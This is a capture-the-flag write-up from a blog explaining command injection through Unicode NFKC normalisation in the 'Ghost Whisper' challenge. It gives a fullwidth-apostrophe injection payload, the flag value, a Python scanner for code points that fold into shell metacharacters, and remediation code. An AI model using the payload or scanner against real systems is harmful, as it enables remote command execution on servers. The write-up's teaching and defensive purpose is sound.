Cyb3r7hr347's Blog

Ghost Whisper - Command Injection via Unicode Normalization

Writeup for the Ghost Whisper challenge on YesWeHack.


Description

whisperMsg is user input that the application interpolates into a shell command string and runs with os.popen(). The processing of whisperMsg is vulnerable to command injection.

The code first tries to sanitise the input by replacing the ASCII apostrophe (', U+0027) with an underscore, and only then normalises the string with unicodedata.normalize("NFKC", ...).

That ordering is the bug. An attacker can supply a compatibility homoglyph such as the Fullwidth Apostrophe (＇, U+FF07). The replace() call looks only for U+0027, so it leaves the fullwidth character untouched; the NFKC step that follows then folds U+FF07 into a plain ASCII apostrophe. The sanitiser's own normalisation thus manufactures exactly the quote character the attacker needs to break out of the quoted string and run commands.

Exploitation

Payload Crafting

The attacker creates a payload using the Fullwidth Apostrophe (＇, U+FF07) instead of the standard apostrophe (', U+0027).

Payload:

＇; $FLAG ; echo＇

Filter Bypass

  1. The application's sanitiser (whisperMsg.replace("'", "_")) runs first. It looks only for U+0027, finds none, and passes the payload through unchanged.

  2. Malicious Normalization: The payload is then passed to unicodedata.normalize("NFKC", ...), which folds every Fullwidth Apostrophe (U+FF07) into the standard ASCII ' (U+0027). whisperMsg now contains the string: '; $FLAG ; echo'

  3. Command Execution: This string is interpolated into the os.popen() command. The shell receives and executes the following:

    echo -n ''; $FLAG ; echo'' | hexdump
  4. Data Exfiltration: The first apostrophe closes the quoted argument to echo and the ; ends that command. $FLAG is unquoted and in command position, so the shell expands it and tries to execute the flag's value as a command name; the error text the shell prints for that attempt contains the flag value, and that output is returned to the attacker. The trailing echo'' exists only to consume the closing apostrophe the application appends, so the line stays syntactically valid (note that the pipe to hexdump binds only to that final echo, not to the injected segment).
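The bypass described in the steps above, reconstructed as an added Python example (this is not the challenge's source; the command template is taken from the command shown in step 3, and the function names are chosen for this example). The last function goes beyond the single U+FF07 case: it scans every code point for NFKC forms that contain a shell metacharacter, which is the list a tester would try against any filter that runs before normalisation.

```python
import unicodedata

# Added example (not the challenge's own code). The command template is taken from the
# writeup ("echo -n '...' | hexdump"); the function names are this example's choice.

# Characters that change the meaning of a command line when they appear unquoted.
SHELL_METACHARS = "'\"`$;|&<>(){}"


def vulnerable_sanitize(whisper_msg: str) -> str:
    """The order the writeup describes: strip U+0027 first, NFKC-normalise afterwards."""
    cleaned = whisper_msg.replace("'", "_")          # sees only the ASCII apostrophe
    return unicodedata.normalize("NFKC", cleaned)    # U+FF07 -> U+0027 happens here, after the check


def build_command(whisper_msg: str) -> str:
    """Return the string the application would hand to os.popen(). Deliberately not executed."""
    return f"echo -n '{vulnerable_sanitize(whisper_msg)}' | hexdump"


def nfkc_foldable_metachars() -> dict[str, list[str]]:
    """For each shell metacharacter, list every code point whose NFKC form contains it.

    This generalises the U+FF07 trick: any character listed here survives a filter that
    runs before normalisation and is turned into the metacharacter afterwards.
    """
    hits: dict[str, list[str]] = {c: [] for c in SHELL_METACHARS}
    for cp in range(0x80, 0x110000):
        if 0xD800 <= cp <= 0xDFFF:                   # lone surrogates are not characters
            continue
        ch = chr(cp)
        folded = unicodedata.normalize("NFKC", ch)
        if folded == ch:
            continue
        for meta in SHELL_METACHARS:
            if meta in folded:
                hits[meta].append(ch)
    return hits


if __name__ == "__main__":
    ascii_payload = "'; $FLAG ; echo'"
    fullwidth_payload = "\uff07; $FLAG ; echo\uff07"
    print("ASCII apostrophe  :", build_command(ascii_payload))      # quotes neutralised
    print("fullwidth (U+FF07):", build_command(fullwidth_payload))  # injection survives
    for meta, chars in nfkc_foldable_metachars().items():
        names = ", ".join(f"U+{ord(c):04X} {unicodedata.name(c, '?')}" for c in chars[:3])
        print(f"{meta!r}: {len(chars)} code point(s), e.g. {names}")
```

Running it shows the ASCII payload reduced to `_; $FLAG ; echo_` while the fullwidth payload yields the exact command string from step 3. The scan also turns up fullwidth forms for `;`, `$`, `|` and the backtick, and multi-character folds such as U+2474 (⑴) expanding to `(1)`; by contrast U+2019 (the typographic right single quote) has no compatibility decomposition and does not appear, so not every lookalike works.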

PoC

Submit the following payload as input whisperMsg:

＇; $FLAG ; echo＇

Flag: FLAG{Gh0s7_S4y_BOOO000oooo}

Risk

The vulnerability allows Remote Code Execution (RCE) on the server: an attacker can run arbitrary shell commands with the privileges of the Python process that calls os.popen(), which is a critical risk for the application server.

This vulnerability affects the confidentiality, integrity and availability of the server and customer data.

Remediation

The best way to prevent this vulnerability is not to execute OS commands from application code at all; the hex encoding that hexdump provides can be done in the language itself. Where an external program is unavoidable, invoke it with an argument list (for example subprocess.run([...]) with shell=False) and hand user data to it via stdin or as its own argv element, never by interpolating it into a command string. Independently of that, run any validation after Unicode normalisation rather than before, and prefer an allow-list of permitted characters over stripping individual bad ones: a filter that runs before NFKC can always be fooled by a compatibility character that folds into the very thing it was meant to remove.
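A hardened version of the handler, as an added Python example (not the challenge's fixed code; the allow-list, the function names and the use of POSIX od in place of hexdump are choices made for this example). It shows the two independent defences: normalise-then-validate against an allow-list, and, if a subprocess is really needed, a fixed argv with the message passed as stdin data so that no quoting trick can alter the command.

```python
import re
import subprocess
import unicodedata

# Added example (not the challenge's own code). ALLOWED, the function names and the use of
# POSIX od instead of hexdump are this example's choices.

# Allow-list applied to the *normalised* text: letters, digits, spaces and a little punctuation.
ALLOWED = re.compile(r"[A-Za-z0-9 .,!?_-]{1,256}")


def normalize_then_validate(whisper_msg: str) -> str:
    """Normalise first, then validate, so the check sees the same text the command would."""
    msg = unicodedata.normalize("NFKC", whisper_msg)
    if not ALLOWED.fullmatch(msg):
        raise ValueError("whisperMsg contains characters outside the allow-list")
    return msg


def is_accepted(whisper_msg: str) -> bool:
    """True if the message passes the post-normalisation allow-list."""
    try:
        normalize_then_validate(whisper_msg)
        return True
    except ValueError:
        return False


def hex_whisper(whisper_msg: str) -> str:
    """Preferred fix: do the work in Python and never spawn a shell at all."""
    return normalize_then_validate(whisper_msg).encode("utf-8").hex()


def od_invocation(whisper_msg: str) -> tuple[list[str], bytes]:
    """If an external tool is unavoidable: a fixed argv and the message as stdin *data*.

    No user-controlled text ever becomes part of the command line, so even an
    unvalidated payload cannot change which program runs or what its arguments are.
    The allow-list above is defence in depth on top of this, not a substitute for it.
    """
    argv = ["od", "-An", "-tx1", "-v"]                 # fixed; nothing is interpolated
    data = unicodedata.normalize("NFKC", whisper_msg).encode("utf-8")
    return argv, data


def hex_whisper_subprocess(whisper_msg: str) -> list[str]:
    """Run od (assumed installed) with shell=False; returns the hex bytes it printed."""
    argv, data = od_invocation(whisper_msg)
    proc = subprocess.run(argv, input=data, capture_output=True, check=True)  # no shell
    return proc.stdout.decode().split()


if __name__ == "__main__":
    payload = "\uff07; $FLAG ; echo\uff07"
    print("accepted by allow-list:", is_accepted(payload))          # False
    print("argv/data for od      :", od_invocation(payload))        # payload is inert data
    print("hex of a benign message:", hex_whisper("Boo!"))
```

The payload is rejected by the allow-list because it is checked after NFKC has already produced the apostrophes; and even if the allow-list were removed, od_invocation hands the bytes `'; $FLAG ; echo'` to od on stdin, where they are just data to be dumped.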

